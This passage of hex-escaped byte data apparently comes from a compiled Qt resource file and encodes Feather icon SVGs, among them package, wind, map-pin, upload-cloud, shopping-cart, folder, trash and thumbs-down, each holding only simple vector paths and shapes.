\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x61\x63\x6b\x61\
\x67\x65\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\
\x2e\x35\x22\x20\x79\x31\x3d\x22\x39\x2e\x34\x22\x20\x78\x32\x3d\
\x22\x37\x2e\x35\x22\x20\x79\x32\x3d\x22\x34\x2e\x32\x31\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x31\x20\x31\x36\x56\x38\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x2d\x31\x2d\x31\x2e\x37\x33\x6c\x2d\x37\x2d\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x30\x6c\x2d\x37\x20\
\x34\x41\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x33\x20\x38\x76\
\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x20\x31\x2e\
\x37\x33\x6c\x37\x20\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x20\x32\x20\x30\x6c\x37\x2d\x34\x41\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x31\x20\x31\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x33\x2e\x32\x37\x20\x36\x2e\x39\x36\x20\x31\x32\
\x20\x31\x32\x2e\x30\x31\x20\x32\x30\x2e\x37\x33\x20\x36\x2e\x39\
\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\
\x32\x32\x2e\x30\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\
\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x46\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x77\x69\x6e\x64\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x2e\x35\x39\x20\
\x34\x2e\x35\x39\x41\x32\x20\x32\x20\x30\x20\x31\x20\x31\x20\x31\
\x31\x20\x38\x48\x32\x6d\x31\x30\x2e\x35\x39\x20\x31\x31\x2e\x34\
\x31\x41\x32\x20\x32\x20\x30\x20\x31\x20\x30\x20\x31\x34\x20\x31\
\x36\x48\x32\x6d\x31\x35\x2e\x37\x33\x2d\x38\x2e\x32\x37\x41\x32\
\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x31\x20\x31\x20\x31\x39\x2e\
\x35\x20\x31\x32\x48\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x57\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x72\x65\x2d\
\x68\x6f\x72\x69\x7a\x6f\x6e\x74\x61\x6c\x22\x3e\x3c\x63\x69\x72\
\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\
\x31\x32\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\
\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x39\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x35\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x0e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\x20\x31\x38\
\x20\x31\x35\x20\x31\x32\x20\x39\x20\x36\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x42\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x61\x70\x2d\x70\
\x69\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\
\x20\x31\x30\x63\x30\x20\x37\x2d\x39\x20\x31\x33\x2d\x39\x20\x31\
\x33\x73\x2d\x39\x2d\x36\x2d\x39\x2d\x31\x33\x61\x39\x20\x39\x20\
\x30\x20\x30\x20\x31\x20\x31\x38\x20\x30\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x30\x22\x20\x72\x3d\x22\x33\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xaf\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x70\x6c\x6f\x61\
\x64\x2d\x63\x6c\x6f\x75\x64\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x31\x36\
\x20\x31\x32\x20\x31\x32\x20\x38\x20\x31\x36\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\
\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\
\x30\x2e\x33\x39\x20\x31\x38\x2e\x33\x39\x41\x35\x20\x35\x20\x30\
\x20\x30\x20\x30\x20\x31\x38\x20\x39\x68\x2d\x31\x2e\x32\x36\x41\
\x38\x20\x38\x20\x30\x20\x31\x20\x30\x20\x33\x20\x31\x36\x2e\x33\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x31\x36\
\x20\x31\x32\x20\x31\x32\x20\x38\x20\x31\x36\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x7f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x6f\x70\x70\
\x69\x6e\x67\x2d\x63\x61\x72\x74\x22\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x39\x22\x20\x63\x79\x3d\x22\x32\x31\x22\
\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x32\x30\x22\x20\
\x63\x79\x3d\x22\x32\x31\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x20\x31\x68\x34\x6c\x32\x2e\x36\x38\x20\x31\x33\x2e\x33\
\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x31\x2e\
\x36\x31\x68\x39\x2e\x37\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x32\x2d\x31\x2e\x36\x31\x4c\x32\x33\x20\x36\x48\x36\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x37\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x6f\x6c\x64\x65\
\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\
\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\
\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\
\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\
\x68\x35\x6c\x32\x20\x33\x68\x39\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x20\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x2d\
\x63\x68\x65\x63\x6b\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x36\x20\x32\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x2d\x34\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x2d\x34\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\
\x35\x22\x20\x63\x79\x3d\x22\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x31\
\x20\x31\x39\x20\x31\x33\x20\x32\x33\x20\x39\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x63\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x69\x6e\x6b\x2d\
\x32\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x35\x20\
\x37\x68\x33\x61\x35\x20\x35\x20\x30\x20\x30\x20\x31\x20\x35\x20\
\x35\x20\x35\x20\x35\x20\x30\x20\x30\x20\x31\x2d\x35\x20\x35\x68\
\x2d\x33\x6d\x2d\x36\x20\x30\x48\x36\x61\x35\x20\x35\x20\x30\x20\
\x30\x20\x31\x2d\x35\x2d\x35\x20\x35\x20\x35\x20\x30\x20\x30\x20\
\x31\x20\x35\x2d\x35\x68\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\
\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\
\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xc0\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x61\x73\x68\
\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x33\x20\x36\x20\x35\x20\x36\x20\x32\x31\
\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x39\x20\x36\x76\x31\x34\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x48\x37\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x36\
\x6d\x33\x20\x30\x56\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x2d\x32\x68\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x20\x32\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\x79\x31\x3d\
\x22\x31\x31\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\x32\x3d\
\x22\x31\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x34\x22\x20\x79\x31\x3d\x22\x31\x31\
\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\x31\x37\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x76\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x68\x75\x6d\x62\
\x73\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x31\x30\x20\x31\x35\x76\x34\x61\x33\x20\x33\x20\x30\x20\
\x30\x20\x30\x20\x33\x20\x33\x6c\x34\x2d\x39\x56\x32\x48\x35\x2e\
\x37\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x31\
\x2e\x37\x6c\x2d\x31\x2e\x33\x38\x20\x39\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x20\x32\x20\x32\x2e\x33\x7a\x6d\x37\x2d\x31\x33\
\x68\x32\x2e\x36\x37\x41\x32\x2e\x33\x31\x20\x32\x2e\x33\x31\x20\
\x30\x20\x30\x20\x31\x20\x32\x32\x20\x34\x76\x37\x61\x32\x2e\x33\
\x31\x20\x32\x2e\x33\x31\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x33\
\x33\x20\x32\x48\x31\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x91\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
